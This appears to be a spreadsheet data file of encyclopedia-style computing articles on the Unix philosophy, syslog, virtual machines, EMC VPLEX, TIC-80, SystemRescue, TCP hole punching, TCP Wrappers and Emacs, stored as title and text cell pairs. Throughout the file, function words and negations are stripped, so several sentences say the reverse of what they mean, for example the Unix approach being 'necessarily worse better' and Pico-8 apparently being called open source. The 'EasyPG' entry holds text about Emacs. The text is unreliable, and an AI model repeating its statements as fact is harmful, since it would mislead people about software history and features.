special-purpose, one-time programs. authors contrast unix tools larger program suites used systems. design typical unix programs: implements simple general function used many different applications (including many envisioned original author). other commands used functions. example, separate commands file system tasks like renaming files, deleting them, telling are. other systems instead lump single "file system" command internal structure command language own. (the file copy program found operating systems like cp/m rsx-11 example.) that approach necessarily worse better, certainly unix philosophy. doug mcilroy unix programming mcilroy, head bell labs computing sciences research center, inventor unix pipe, summarized unix philosophy follows: this unix philosophy: write programs thing well. write programs work together. write programs handle text streams, universal interface. beyond statements, also emphasized simplicity minimalism unix programming: notion "intricate beautiful complexities" almost oxymoron. unix programmers "simple beautiful" honors point that's implicit rules, well worth making overt. conversely, mcilroy criticized modern linux software bloat, remarking that, "adoring admirers linux goodies disheartening state obesity." contrasts earlier approach taken bell labs developing revising research unix: everything small... heart sinks linux size [...] manual page, really used manual page, small volume, thousand options... used around unix room saying, 'what throw out? option?' it's often deficiency basic design really right design point. instead adding option, think forcing option. thing well stated mcilroy, generally accepted throughout unix community, unix programs always expected follow concept dotadiw, thing well." there limited sources acronym dotadiw internet, discussed length development packaging operating systems, especially linux community. patrick volkerding, project lead slackware linux, invoked design principle criticism systemd architecture, stating that, "attempting control services, sockets, devices, mounts, etc., within daemon flies face unix concept thing well." eric raymond's unix rules book unix programming first published 2003, eric raymond (open source advocate programmer) summarizes unix philosophy kiss principle "keep simple, stupid." provides series design rules: build modular programs write readable programs composition separate mechanisms policy write simple programs write small programs write transparent programs write robust programs make data complicated required, program build potential users' expected knowledge avoid unnecessary output write programs fail easy diagnose value developer time machine time write abstract programs generate code instead writing code hand prototype software polishing write flexible open programs make program protocols extensible. mike gancarz: unix philosophy 1994, mike gancarz member team designed window system) drew experience unix, well discussions fellow programmers people fields depended unix, produce unix philosophy sums nine paramount precepts: small beautiful. make program thing well. build prototype soon possible. choose portability efficiency. store data flat text files. software leverage advantage. shell scripts increase leverage portability. avoid captive user interfaces. make every program filter. "worse better" richard gabriel suggests advantage unix embodied design philosophy termed "worse better", simplicity interface implementation important attributes system—including correctness, consistency, completeness. gabriel argues design style evolutionary advantages, though questions quality results. example, early days unix used monolithic kernel (which means user processes carried kernel system calls user stack). signal delivered process blocked long-term kernel, done? should signal delayed, possibly long time (maybe indefinitely) completed? signal handler could executed process kernel mode, sensitive kernel data stack. should kernel back-out system call, store replay restart later, assuming signal handler completes successfully? cases thompson dennis ritchie favored simplicity perfection. unix system would occasionally return early system call error stating done nothing—the "interrupted system call", error number (eintr) today's systems. course call aborted order call signal handler. this could happen handful long-running system calls read(), write(), open(), select(). plus side, made system many times simpler design understand. vast majority user programs never affected handle experience signals sigint would right away raised. programs—things like shells text editors respond control presses—small wrappers could added system calls retry call right away eintr error raised. thus, problem solved simple manner. criticism 1981 article entitled "the truth unix: user interface horrid" published datamation, norman criticized design philosophy unix lack concern user interface. writing background cognitive science perspective then-current philosophy cognitive engineering, focused end-users comprehend form personal cognitive model systems—or, case unix, fail understand, result disastrous mistakes (such losing hour's worth work) easy. also cognitive engineering unix architecture minimalism (computing) software engineering kiss principle hacker ethic list software development philosophies everything file worse better notes references unix programming environment brian kernighan pike, 1984 program design unix environment paper pike kernighan preceded book. notes programming pike, september 1989 quarter century unix, peter salus, addison-wesley, 1994 (isbn 0-201-54777-5) philosophy unix programming, eric raymond, addison-wesley, september 2003 (isbn 0-13-142901-9) final report multics kernel design project schroeder, clark, saltzer, wells, 1977. unix philosophy, mike gancarz, isbn 1-55558-123-4 external links basics unix philosophy catb.org unix philosophy: brief introduction linux information project (linfo) unix philosophy still matters</t>
  </si>
  <si>
    <t>Elegant degradation</t>
  </si>
  <si>
    <t>elegant degradation term used engineering describe occurs machines subject constant, repetitive stress. externally, machine maintains appearance user, appearing function properly. internally, machine slowly weakens time. eventually, unable withstand stress, eventually breaks down. compared graceful degradation, operational quality decrease all, breakdown sudden.this term's meaning varies depending context field, strictly considered exclusive engineering. instance, used mechanism food industry applied degradation lignin, cellulose, pentosan, polymers, among others. concept also used extract chemicals elegant degradation paederus fuscipes obtain pederin hemiacetal pseuodopederin. process degradation induced heat. play name also used metaphor current state world. also fail safe fail soft references</t>
  </si>
  <si>
    <t>Sysmon envsys</t>
  </si>
  <si>
    <t>Syslog</t>
  </si>
  <si>
    <t>computing, syslog standard message logging. allows separation software generates messages, system stores them, software reports analyzes them. each message labeled facility code, indicating type system generating message, assigned severity level. computer system designers syslog system management security auditing well general informational, analysis, debugging messages. wide variety devices, printers, routers, message receivers across many platforms syslog standard. this permits consolidation logging data different types systems central repository. implementations syslog exist many operating systems. when operating network, syslog uses client-server architecture syslog server listens logs messages coming clients. history syslog developed 1980s eric allman part sendmail project. readily adopted applications since become standard logging solution unix-like systems. variety implementations also exist operating systems commonly found network devices, routers.syslog originally functioned facto standard, without authoritative published specification, many implementations existed, incompatible. internet engineering task force documented status 3164. standardized 5424.various companies attempted claim patents specific aspects syslog implementations. this little effect standardization protocol. message components information provided originator syslog message includes facility code severity level. syslog software adds information information header passing entry syslog receiver. such components include originator process timestamp, hostname address device. facility facility code used specify type system logging message. messages different facilities handled differently. list facilities available described standard:: mapping facility code keyword uniform different operating systems syslog implementations. severity level list severities also described standard:: meaning severity levels emergency debug relative application. example, purpose system process transactions update customer account balance information, error final step assigned alert level. however, error occurring attempt display code customer assigned error even warning level. server process handles display messages usually includes lower (more severe) levels display less severe levels requested. that messages separated individual severity, warning level entry also included filtering notice, info debug messages. message 3164, message component (known msg) specified fields: tag, name program process generated message, content contains details message. described 5424, "msg called content 3164. part header, single field. split app-name, procid, msgid. this totally resemble usage tag, provides functionality cases." popular syslog tools rsyslog conform standard. content field encoded utf-8 character octet values traditional ascii control character range avoided. logger generated messages directed various destinations including console, files, remote syslog servers, relays. most implementations provide command line utility, often called logger, well software library, send messages log.to display monitor collected logs needs client application access file directly system. basic command line tools tail grep. servers configured send logs network addition local files). some implementations include reporting programs filtering displaying syslog messages. network protocol when operating network, syslog uses client-server architecture server listens well-known registered port protocol requests clients. historically common transport layer protocol network logging user datagram protocol (udp), server listening port 514. because lacks congestion control mechanisms, transmission control protocol (tcp) port 6514 used; transport layer security also required implementations recommended general use. limitations since process, application, operating system written independently, little uniformity payload message. reason, assumption made formatting contents. syslog message formatted (rfc 5424 gives augmented backus–naur form (abnf) definition), field not. network protocol simplex communication, means acknowledging delivery originator. outlook various groups working draft standards detailing syslog network security event logging, proposed application within healthcare environment.regulations, sarbanes–oxley act, dss, hipaa, many others, require organizations implement comprehensive security measures, often include collecting analyzing logs many different sources. syslog format proven effective consolidating logs, many open-source proprietary tools reporting analysis logs. utilities exist conversion windows event formats syslog. managed security service providers attempt apply analytical techniques artificial intelligence algorithms detect patterns alert customers problems. internet standard documents syslog protocol defined request comments (rfc) documents published internet engineering task force (internet standards). following list rfcs define syslog protocol: syslog protocol. 3164. (obsoleted syslog protocol. 5424.) reliable delivery syslog. 3195. syslog protocol. 5424. transport mapping syslog. 5425. transmission syslog messages udp. 5426. textual conventions syslog management. 5427. signed syslog messages. 5848. datagram transport layer security (dtls) transport mapping syslog. 6012. transmission syslog messages tcp. 6587. also references external links internet engineering task force: datatracker: syslog working group (concluded) sans institute: "the outs system logging using syslog" (white paper) national institute standards technology: "guide computer security management" (special publication 800-92) (white paper) network management software: "understanding syslog: servers, messages security" paessler explained syslog monitorware: syslog</t>
  </si>
  <si>
    <t>System virtual machine</t>
  </si>
  <si>
    <t>computing, system virtual machine virtual machine provides complete system platform supports execution complete operating system (os). these usually emulate existing architecture, built purpose either providing platform programs real hardware available (for example, executing otherwise obsolete platforms), multiple instances virtual machines leading efficient computing resources, terms energy consumption cost effectiveness (known hardware virtualization, cloud computing environment), both. originally defined popek goldberg efficient, isolated duplicate real machine". system virtual machines system virtual machine advantages: multiple environments co-exist primary hard drive, virtual partition allows sharing files generated either "host" operating system "guest" virtual environment. adjunct software installations, wireless connectivity, remote replication, printing faxing, generated guest host operating systems. regardless system, files stored hard drive host application provisioning, maintenance, high availability disaster recovery inherent virtual machine software selected. provide emulated hardware environments different host's instruction architecture (isa), emulation using just-in-time compilation.the main disadvantages are: virtual machine less efficient actual machine accesses host hard drive indirectly. when multiple concurrently running hard drive actual host, adjunct virtual machines exhibit varying and/or unstable performance (speed execution malware protection). this depends data load imposed system vms, unless selected software provides temporal isolation among virtual machines. malware protections necessarily compatible "host", require separate software.multiple running guest operating system frequently engaged server consolidation order avoid interference separate actual machine platform. desire multiple operating systems initial motivation virtual machines, allow time-sharing among several single-tasking operating systems. respects, system virtual machine considered generalization concept virtual memory historically preceded ibm's cp/cms, first systems allow full virtualization, implemented time sharing providing user single-user operating system, cms. unlike virtual memory, system virtual machine entitled user write privileged instructions code. this approach certain advantages, adding input/output devices allowed standard system.as technology evolves virtual memory purposes virtualization, systems memory overcommitment applied manage memory sharing among multiple virtual machines actual computer operating system. possible share "memory pages" identical contents among multiple virtual machines physical machine, result mapping physical page technique known kernel samepage merging. this particularly useful read-only pages, contain code segments; particular, would case multiple virtual machines running similar software, software libraries, servers, middleware components, etc. guest operating systems need compliant host hardware, thereby making possible different operating systems computer (e.g., microsoft windows, linux, previous versions operating system) support future software. virtual machines support separate guest operating systems popular regard embedded systems. typical would real-time operating system simultaneously preferred complex operating system, linux windows. another would novel unproven software still developmental stage, runs inside sandbox. virtual machines advantages operating system development, include improved debugging access faster reboots. techniques different virtualization techniques used, based desired usage. native execution based direct virtualization underlying hardware, thus provides multiple "instances" architecture real machine based capable running complete operating systems. some virtual machines also emulate different architectures allow execution software applications operating systems written another architecture. operating-system-level virtualization allows resources computer partitioned kernel's support multiple isolated user space instances, usually called containers look feel like real machines users. some computer architectures capable hardware-assisted virtualization, enables efficient full virtualization using virtualization-specific hardware capabilities, primarily host cpus. virtualization underlying hardware (native execution) this approach described full virtualization hardware, implemented using type type hypervisor: type hypervisor runs directly hardware, type hypervisor runs another operating system, linux windows. each virtual machine operating system supported underlying hardware. users thus different "guest" operating systems simultaneously, separate "private" virtual computers. pioneer system using concept ibm's cp-40, first (1967) version ibm's cp/cms (1967–1972) precursor ibm's family (1972–present). with architecture, users relatively simple interactive computing single-user operating system, cms, "guest" control program (vm-cp). this approach kept design simple, running alone; control program quietly provides multitasking resource management services "behind scenes". addition communication system tasks performed multitasking (rscs, gcs, tcp/ip, unix), users operating systems, mvs, even z/os. even simple could threaded environment (listserv, trickle). z/vm current version used support hundreds thousands virtual machines given mainframe. some installations linux servers, linux runs operating system within many virtual machines. full virtualization particularly helpful operating system development, experimental code time older, stable, versions, separate virtual machine. process even recursive: debugged versions virtual machine operating system, virtual machine running older version even used technique simulate hardware.the standard instruction architecture used modern actually meet popek goldberg virtualization requirements. notably, execution mode sensitive machine instructions always trap, would allow per-instruction virtualization. despite limitations, several software packages managed provide virtualization architecture, even though dynamic recompilation privileged code, first implemented vmware, incurs performance overhead compared running natively virtualizable architecture system/370 motorola mc68020. now, several software packages virtual virtualbox, parallels workstation virtual iron manage implement virtualization hardware. intel introduced features processors enable virtualization hardware. well virtualization resources single machine, multiple independent nodes cluster combined accessed single virtual numa machine. emulation non-native system virtual machines also perform role emulator, allowing software applications operating systems written another computer processor architecture run. operating-system-level virtualization operating-system-level virtualization server virtualization technology virtualizes servers operating system (kernel) layer. thought partitioning: single physical server sliced multiple small partitions (otherwise called virtual environments (ve), virtual private servers (vps), guests, zones, etc.); partition looks feels like real server, point view users. example, solaris zones supports multiple guest operating systems running operating system solaris guest operating systems kernel level operating system version, separate copy operating system different kernel version using solaris kernel zones. solaris native zones also requires host operating system version solaris; operating systems manufacturers supported. however, solaris branded zones would need used operating systems zones.another example system workload partitions (wpars), introduced version operating system. system wpars software partitions running instance global environment. operating system level architecture overhead helps maximize efficient server resources. virtualization introduces negligible overhead allows running hundreds virtual private servers single physical server. contrast, approaches full virtualization (like vmware) paravirtualization (like uml) cannot achieve level density, overhead running multiple kernels. from side, operating system-level virtualization allow running different operating systems (i.e., different kernels), although different libraries, distributions, etc. possible. different virtualization techniques used, based desired usage. native execution based direct virtualization underlying hardware, thus provides multiple "instances" architecture real machine based capable running complete operating systems. some virtual machines also emulate different architectures allow execution software applications operating systems written another architecture. operating-system-level virtualization allows resources computer partitioned kernel's support multiple isolated user space instances, usually called containers look feel like real machines users. some computer architectures capable hardware-assisted virtualization, enables efficient full virtualization using virtualization-specific hardware capabilities, primarily host cpus. virtualization-enabled hardware examples virtualization-enabled hardware include following: also notes references further reading james smith, ravi nair, virtual machines: versatile platforms systems processes, morgan kaufmann, 2005, isbn 1-55860-910-5, pages (covers process system virtual machines) craig, iain virtual machines. springer, 2006, isbn 1-85233-969-1, pages (covers process virtual machines) external links reincarnation virtual machines, article queue mendel rosenblum, co-founder, vmware</t>
  </si>
  <si>
    <t>EMC VPLEX</t>
  </si>
  <si>
    <t>vplex virtual computer data storage product introduced corporation 2010. vplex implements distributed "virtualization" layer within across geographically disparate fibre channel storage area networks data centers. history previous virtual storage product corporation called invista announced 2005. supported selected storage area network (san) switches cisco systems brocade communications systems used fibre channel connections. five months announcement, invista shipped, expected much impact 2007. version invista released december 2007, although year later product called "under-delivered". 2009, analysts suggested invista product might best shut down, quietly withdrawn.another storage product called symmetrix remote data facility (srdf) also marketed vplex announced 2010, competing product volume controller. first products 2010 deployments local "metro" milliseconds delay), others supporting longer delays promised future. "geo" version announced 2011 replication wider distances. 2013, product marketed phrase software-defined storage called vipr announced, could vplex data movement. architecture each vplex engine cluster consists redundant directors annex, single rack unit (1u) physical device. each engine fibre channel ports (the model front-end ports back-end ports) fibre channel ports (the model front-end ports back-end ports) protected redundant stand-by power supplies. each vplex director bladed multi-core multi-processor virtualization processing unit containing hot-swappable modules. annex used intra-cluster director communication. each director runs linux kernel specialized storage virtualization environment called geosynchrony, provides proprietary clustering capability. each cluster service management station provides alerting software management capabilities. vplex based standard building block hardware architecture components used symmetrix product line. vplex uses in-band architecture means data flowing host storage controller flows directors. front end, vplex presents interface host looks like standard storage controller scsi target. vplex back end, vplex provides interface physical storage controller like host, essentially like scsi initiator. vplex cluster consists pairs directors pairs). director engine failover director cluster case hardware path failure. references</t>
  </si>
  <si>
    <t>TIC-80</t>
  </si>
  <si>
    <t>tic-80 free open-source fantasy video game console making, playing, sharing games limited platform mimics 8-bit systems 1980s. built-in code, sprite, map, music, sound effect editors, well command line interface allow users develop edit games within console. games made tic-80 exported virtual game cartridges bundled different platforms, including android, linux, macos, windows, baremetal raspberry nintendo 3ds, retroarch, html5 (using webassembly). supports programming languages including javascript, moonscript, lua, well ruby, wren, fennel, squirrel tic-80 often compared pico-8, well known fantasy system open source; systems becoming popular games programmers interested classic home computers consoles. capabilities fantasy console, tic-80 limitations terms graphics processing power order create "retro-styled" gaming experience. these limitations include 240x136 display; color palette; sprites; 4-channel sound. integrated tools within "tiny computer" allow developers edit code, create graphics, write music, build levels within games. specifications color palettes playing sharing games tic-80 runs major operating systems including windows, linux bit, android, compiled source code platforms raspberry "tic" cartridge files, containing playable versions game, generated using integrated development tools. there large growing catalog community-made games available tic-80 site.the tic-80 console featured demo parties outline 2022 netherlands; lovebyte 2021 online; 2018 line fukuoka hackathon japan. references further reading game maker's toolkit: eight more fascinating game-making tools pi". magpi. september 2018. issue 32–33. internet archive littler, clarissa (august 2018). "fantasy computers tic-80". beanz magazine (vol. littler, clarissa (october 2018). "tic-80 project". beanz magazine (vol. littler, clarissa (february 2019). "tic-80 maps music". beanz magazine (vol. proquest pistorio, marco (september 2018). "fantasy console: 80". retro magazine (vol. italian). internet archive yukoku kenji (2019). yukoku, kenji (ed.). phantasy computer tic-80 happy programming guide. asin b07tr5c3q3. (2020). 2dドットゲーム クックブック (i・o books) tankobon japanese). 工学社. 159. isbn 978-4777521029. ユリッペ, (2019). tic‐80プログラミングガイド (i・o books) tankobon japanese). 工学社. 159. isbn 978-4777520824. external links official website github repository</t>
  </si>
  <si>
    <t>SystemRescue</t>
  </si>
  <si>
    <t>systemrescue (previously known "systemrescuecd") linux distribution computers. primary purpose systemrescue repair unbootable otherwise damaged computer systems system crash. systemrescue intended used permanent operating system. runs live flash drive type hard drive. designed team françois dupoux, based arch linux since version 6.0. starting version 6.0, systemd init system. features systemrescue capable graphics using linux framebuffer option tools gparted. options connecting internet adsl modem ethernet graphical browsers mozilla firefox. systemrescue features include: parted gparted partition disks resize partitions, including fat32 ntfs fdisk edit disk partition table partimage disk imaging software copies used sectors testdisk recover lost partition photorec recover lost data smartmontools s.m.a.r.t. suite health reporting data loss prevention ddrescue extract recoverable data physically damaged listing damaged sectors fsarchiver system tool allows save contents file-system compressed archive file nwipe secure data_erasure tool (fork dban) harddrives remove data remanence, supports gutmann method plus overwriting standard algorithms patterns. burner dvd+rw-tools bootloaders grub syslinux browsers firefox, elinks file manager emelfm2 archiving unarchiving abilities file system tools file system create, delete, resize, move support many file systems, including full ntfs read/write access (via ntfs-3g) well fat32 support intel powerpc systems, including macs ability create boot disk operating systems support windows registry editing password changing linux boot freedos, memtest86+, hardware diagnostics boot disks single burning dvds system backup also boot customized almost free space backed-up files. this makes good storing information needed hard drive formatting burn dvd, must burn image file first separate files folders. this affect general works. used insert files hard drive using midnight commander. also parted magic list bootable data recovery software references external links official website systemrescue distrowatch systemrescue sourceforge</t>
  </si>
  <si>
    <t>Easy2Sync for Files</t>
  </si>
  <si>
    <t>easy2sync files backup file synchronization software created microsoft windows environments. allows backing synchronizing files folder trees different drives computers, including network drives servers. features capability remember previous state directories database, thus also synchronize deletions. also detect renamed directories. program fully supports unicode characters copy filenames languages. includes scheduler. supports sync ftp. versioning, ability keep multiple older versions file backup. files folders excluded sync name, size. includes modes (instead synchronizing) copy, move delete files flatten directory structure single directory. program installed onto portable drives (usb) also file synchronization backup references external links http://www.easy2sync.com</t>
  </si>
  <si>
    <t>TCP Cookie Transactions</t>
  </si>
  <si>
    <t>cookie transactions (tcpct) specified 6013 (historic status, formerly experimental) extension transmission control protocol (tcp) intended secure denial-of-service attacks, resource exhaustion flooding malicious connection termination third parties. unlike original cookies approach, tcpct conflict extensions, requires tcpct support client (initiator) well server (responder) stack.the immediate reason tcpct extension deployment dnssec protocol. prior dnssec, requests primarily used short packets, size dnssec exchanges, shortcomings fragmentation, less practical dnssec. thus dnssec-enabled requests create large number short-lived connections.tcpct avoids resource exhaustion server-side allocating resources completion three-way handshake. additionally, tcpct allows server release memory immediately connection closes, persists time-wait state.tcpct support partly merged linux kernel december 2009, removed 2013 never fully implemented performance cost.tcpct deprecated 2016 favor fast open. status original changed "historic". also cookies t/tcp (transactional tcp) fast open references</t>
  </si>
  <si>
    <t>TCP Wrappers</t>
  </si>
  <si>
    <t>wrappers (also known tcp_wrappers) host-based networking system, used filter network access internet protocol servers (unix-like) operating systems linux bsd. allows host subnetwork addresses, names and/or ident query replies, used tokens filter access control purposes. original code written wietse venema 1990 monitor cracker's activities unix workstations department math computer science eindhoven university technology. maintained 1995, june 2001, released bsd-style license. tarball includes library named libwrap implements actual functionality. initially, services spawned connection super-server (such inetd) wrapped, utilizing tcpd program. however common network service daemons today linked libwrap directly. this used daemons operate without spawned super-server, single process handles multiple connections. otherwise, first connection attempt would checked acls. when compared host access control directives often found daemons' configuration files, wrappers benefit runtime reconfiguration (i.e., services reloaded restarted) generic approach network administration. this makes easy anti-worm scripts, denyhosts fail2ban, expire client-blocking rules, excessive connections and/or many failed login attempts encountered. while originally written protect accepting services, examples usage filter certain icmp packets exist too, 'pingd' userspace ping request responder. 1999 trojan january 1999, distribution package eindhoven university technology (the primary distribution site day) replaced modified version. replacement contained trojaned version software would allow intruder access server installed author spotted within hours, upon relocated primary distribution personal site. also dns-based blackhole list forward-confirmed reverse firewall blocking nullroute references external links wrappers source code softpanorama wrappers information</t>
  </si>
  <si>
    <t>TCP hole punching</t>
  </si>
  <si>
    <t>traversal hole punching (sometimes punch-through) computer networking occurs hosts behind network address translation (nat) trying connect outbound connections. such scenario particularly important case peer-to-peer communications, voice-over-ip (voip), file sharing, teleconferencing, chat systems similar applications. hole punching experimentally used traversal technique establishing connection peers internet behind devices. traversal general term techniques establish maintain tcp/ip network and/or connections traversing gateways. terminology following, terms host, client peer used almost interchangeably. local endpoint, internal endpoint local ip:port seen locally host internal part nat. public endpoint, external endpoint external ip:port mapped nat, seen network external part nat. remote endpoint ip:port peer seen network, external parts nats. description traversal, hole punching, establishes bidirectional connections internet hosts private networks using nat. work types nats, behavior standardized. when hosts connecting tcp, outbound connections, "simultaneous open" case state machine diagram. network drawing types availability hole punching depends type computer port allocation used nat. peers behind connect simultaneous open, need know little other. thing absolutely need know "location" peer, remote endpoint. remote endpoint data address port peer connect peers, initiate connections binding local ports respectively, need know remote endpoint port mapped make connection. when peers behind nat, discover public remote endpoint peer problem called port prediction. traversal hole punching techniques solve port prediction problem. port allocation two: predictable gateway uses simple algorithm local port port. most time port preservation, means local port mapped port nat. predictable gateways algorithm either random impractical predict.depending whether nats exhibit predictable non-predictable behavior, possible perform connection simultaneous open, shown connection matrix representing different cases impact end-to-end communication: yes: connection work time connection almost never work techniques methods port prediction (with predictable nats) here methods used nats allow peers perform port prediction: assigns sequential internal ports sequential external ports.if remote peer information mapping, guess value subsequent mappings. connection happen steps, first peers make connection third party learn mapping. second step, peers guess port mapping subsequent connections, solves port prediction. this method requires making least consecutive connections peer requires third party. this method work properly case carrier-grade subscribers behind addresses, limited number ports available allocating consecutive ports internal host impractical impossible. uses port preservation allocation scheme: maps source port internal peer public port.in case, port prediction trivial, peers simply exchange port bound another communication channel (such udp, dht) making outbound connections simultaneous open. this method requires connection peer require third party perform port prediction. uses "endpoint independent mapping": successive connections coming internal endpoint mapped public endpoint.with solution, peers first connect third party server save port mapping value give peers port mapping value peer. second step, peers reuse local endpoint perform simultaneous open other. this unfortunately requires so_reuseaddr sockets, violates standard lead data corruption. used application protect data corruption. details typical connection instantiation hole punching assume port prediction already taken place methods outlined above, peer knows remote peer endpoint. both peers make posix connect call peer endpoint. simultaneous open happen follows: peer sends peer peer sends peer when nat-a receives outgoing peer creates mapping state machine. when nat-b receives outgoing peer creates mapping state machine. both cross somewhere along network path, then: peer reaches nat-b, peer reaches nat-a depending timing events (where network cross), least incoming through, internal destination peer upon receipt syn, peer sends syn+ack back connection established. interoperability requirements hole punching other requirements comply simultaneous open simultaneous open work, should: send response incoming packet part mapping accept incoming public endpoint previously seen outgoing endpointthis enough guarantee nats behave nicely respect simultaneous open. hole punching carrier-grade (cgn) technique described works fine within cgn. also make port overloading behavior, means distinct internal endpoints port value mapped public endpoint. this break uniqueness {protocol, public address, public port, remote address, remote port} quintuple and, result, acceptable. port preservation also lead cases ports overloaded issue protocol soundness. port overloading allows hosts internally preserving end-to-end communication guarantees. also hole punching (networking) icmp hole punching port control protocol (pcp) hole punching references</t>
  </si>
  <si>
    <t>EasyPG</t>
  </si>
  <si>
    <t>emacs free software text editor. created project founder richard stallman, based emacs editor developed unix operating systems. emacs central component project flagship project free software movement. emacs sometimes abbreviated gnumacs, especially differentiate emacs variants. line emacs "the extensible self-documenting text editor". history 1976, stallman wrote first emacs (“editor macros”), 1984, began work emacs, produce free software alternative proprietary gosling emacs. emacs initially based gosling emacs, stallman's replacement mocklisp interpreter true lisp interpreter required nearly code rewritten. this became first program released nascent project. emacs written provides emacs lisp, also implemented extension language. version first public release, made march 1985. first widely distributed version emacs version 15.34, released later 1985. early versions emacs numbered "1.x.x," initial digit denoting version core. dropped version 1.12 thought major number would never change, thus major version skipped "13". third version number added represent changes made user sites. current numbering scheme, number components signifies release version, development versions three components.gnu emacs later ported unix operating system. offered features gosling emacs, particular full-featured lisp extension language, soon replaced gosling emacs facto unix emacs editor. markus hess exploited security flaw emacs's email subsystem 1986 cracking spree, gained superuser access unix computers.although users commonly submitted patches elisp code net.emacs newsgroup, participation emacs development relatively restricted 1999, used example "cathedral" development style cathedral bazaar. project since adopted public development mailing list anonymous access. development took place single trunk 2008, today uses dvcs. richard stallman remained principal maintainer emacs, stepped back role times. stefan monnier chong yidong overseen maintenance since 2008. september 2015 monnier announced would stepping maintainer effective feature freeze emacs longtime contributor john wiegley announced maintainer november 2015. wiegley joined zaretskii july, 2016, lars ingebrigtsen september, 2020. licensing terms general public license (gpl) state emacs source code, including emacs lisp components, freely available examination, modification, redistribution. older versions emacs documentation appeared ad-hoc license required inclusion certain text modified copy. emacs user's manual, example, included instructions obtaining emacs richard stallman's essay manifesto. xemacs manuals, inherited older emacs manuals fork occurred, license. newer versions documentation free documentation license "invariant sections" require inclusion documents manuals proclaim manuals. emacs, like many packages, remains policy accept significant code contributions copyright holder executes suitable disclaimer assignment copyright interest free software foundation. fixes minor code contributions fewer lines exempt. this policy place defend software court copyleft license violated. 2011, noticed emacs accidentally releasing binaries without corresponding source code years, opposition intended spirit gpl. richard stallman described incident mistake", promptly fixed. downstream redistributors unknowingly violated distributing binaries. using emacs commands normal editing mode, emacs behaves like text editors allows user insert characters corresponding keys move editing point arrow keys. escape sequences pressing control and/or meta key, super keys conjunction regular produces modified keystrokes invoke functions emacs lisp environment. commands save-buffer save-buffers-kill-emacs combine multiple modified keystrokes. some emacs commands work invoking external program, ispell spell-checking compiler collection (gcc) program compilation, parsing program's output, displaying result emacs. emacs also supports "inferior processes"—long-lived processes interact emacs buffer. this used implement shell-mode, running unix shell inferior process, well read–eval–print loop (repl) modes various programming languages. emacs' support external processes makes attractive environment interactive programming along lines interlisp smalltalk.users prefer common user access-style keys cua-mode, package originally third-party add-on included emacs since version minibuffer emacs uses "minibuffer," normally bottommost line, present status request information—the functions would typically performed dialog boxes guis. minibuffer holds information text target search name file read save. when applicable, command-line completion available using space keys. file management display emacs keeps text data structures known buffers. buffers displayed onscreen, buffer features accessible emacs lisp program user interface. user create buffers dismiss unwanted ones, many buffers exist time. there upper limit number buffers emacs allows, hardware memory limits. advanced users amass hundreds open buffers various types relating current work. emacs configured save list open buffers exit, reopen list restarted.some buffers contain text loaded text files, user edit save back permanent storage. these buffers said "visiting" files. buffers also serve display data, output emacs commands, dired directory listings, documentation strings displayed "help" library notification messages editors would displayed dialog box. some notifications displayed briefly minibuffer, emacs provides *messages* buffer keeps history recent notifications type. when minibuffer used output emacs, called "echo area". longer notifications displayed buffers own. maximum length messages displayed minibuffer course, configurable. buffers also serve input output areas external process shell repl. buffers emacs creates typically named asterisks end, distinguish user buffers. list open buffers displayed type buffer. most emacs sequences remain functional buffer. example, standard ctrl-s isearch function used search filenames dired buffers, file list saved text file buffer. dired buffers switched writable mode, filenames attributes edited textually; buffer saved, changes written filesystem. this allows multiple files renamed using search replace features emacs. when equipped, emacs displays image files buffers. emacs binary safe 8-bit clean.emacs split editing area separate non-overlapping sections called "windows," feature available since 1975, predating graphical user interface common use. emacs terminology, "windows" similar systems call "frames" "panes" rectangular portion program's display updated interacted independently. each emacs window status called "mode line" displayed default bottom edge window. emacs windows available text-terminal graphical modes allow buffer, several parts buffer, displayed once. common applications display dired buffer along contents files current directory (there special modes make file buffer follow file highlighted dired), display source code program window another displays shell buffer results compiling program, debugger along shell buffer running program, work code displaying page documentation (possibly loaded world wide using emacs' built-in browsers) simply display multiple files editing header along implementation file c-based languages. addition, follow-mode, minor mode chains windows display non-overlapping portions buffer. using follow-mode, single file displayed multiple side-by-side windows update appropriately scrolled. addition, emacs supports "narrowing" buffer display portion file, top/bottom buffer navigation functionality buffer size calculations reflecting selected range. emacs windows tiled cannot appear "above" "below" companions. emacs launch multiple "frames", displayed individual windows graphical environment. text terminal, multiple frames displayed stacked filling entire terminal, switched using standard emacs commands. major modes emacs display edit variety different types text adapts behavior entering add-on modes called "major modes". there major modes many different purposes including editing ordinary text files, source code many markup programming languages, well displaying pages, directory listings system info. each major mode involves emacs lisp program extends editor behave conveniently specified type text. major modes typically provide following common features: syntax highlighting ("font lock"): combinations fonts colors, termed "faces," differentiate document elements keywords comments. automatic indentation maintain consistent formatting within file. automatic insertion elements required structure document, spaces, newlines, parentheses. special editing commands, commands jump beginning function editing programming file commands validate documents insert closing tags working markup languages xml. minor modes "minor modes" enables customization. emacs editing buffer major mode time, multiple minor modes operate simultaneously. these operate directly documents, major mode programming language defines separate minor mode popular indent styles, alter editing environment. examples latter include mode adds ability undo changes window configuration performs on-the-fly syntax checking. there also minor mode allows multiple major modes used single file, convenience editing document multiple programming languages embedded. "batch mode" emacs supports capability interpreter emacs lisp language without displaying text editor user interface. batch mode, user configuration loaded terminal interrupt characters usual effect exiting program suspending execution instead invoking emacs keybindings. emacs command line options specify either file load execute, emacs lisp function passed command line. emacs start execute passed-in file function, print results, exit. shebang line #!/usr/bin/emacs --script allows creation standalone scripts emacs lisp. batch mode emacs mode describes alternate execution mode emacs program. manuals apart built-in documentation, emacs detailed manual. electronic copy emacs manual, written richard stallman, bundled emacs viewed built-in info browser. additional manuals, emacs lisp reference manual lewis, richard stallman, laliberte introduction programming emacs lisp robert chassell, included. three manuals also published book form free software foundation. xemacs manual similar emacs manual, forked time xemacs software forked emacs. internationalization emacs support many alphabets, scripts, writing systems, cultural conventions provides spell-checking many languages calling external programs ispell. version added support bidirectional text left-to-right right-to-left writing direction languages arabic, persian hebrew. many character encoding systems, including utf-8, supported. emacs uses utf-8 encoding prior versions used encoding internally performed conversion upon load save. internal encoding used xemacs similar emacs differs details. emacs user interface originated english and, exception beginners' tutorial, translated language. subsystem called emacspeak enables visually impaired blind users control editor audio feedback. extensibility behavior emacs modified extended almost without limit incorporating emacs lisp programs define commands, buffer modes, keymaps, command-line options, many extensions providing user-facing functionality define major mode (either file type build non-text-editing user interface); others define commands minor modes, provide functions enhance another extension. many extensions bundled emacs installation; others used downloaded loose files (the usenet newsgroup gnu.emacs.sources traditional means distribution) development managed packages package download sites since version built-in package manager (itself extension) download, install, keep date. list available packages displayed emacs buffer package-mode major mode. notable examples include: auctex, tools edit process latex documents 